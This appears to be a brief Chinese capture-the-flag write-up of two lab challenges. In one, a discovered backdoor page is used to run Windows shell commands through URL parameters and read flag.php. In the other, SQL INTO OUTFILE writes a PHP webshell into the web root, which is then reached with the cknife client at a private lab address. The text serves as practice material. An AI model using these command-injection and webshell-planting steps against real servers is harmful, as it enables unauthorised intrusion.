首先,先是那个后门的洞,用御剑扫出源码,发现一个test的后门,百度查找windows下shell命令, 在url上?page=test&shell=dir 列出所有的文件 发现flag.php dir改成type flag.php 就能得到了。
第二个就是sql写入木马,进入数据库, 先创建一个数据库 CREATE TABLE a( cmd1 text NOT NULL ) INSERT INTO a( cmd1 ) VALUES ( ‘’ ) SELECT cmd1 FROM a INTO OUTFILE ‘D:\phpStudy\WWW\templates\13.php’ 然后用cknife进行连接,http://192.168.12.12/templates/13.php 连接上之后就能看见了
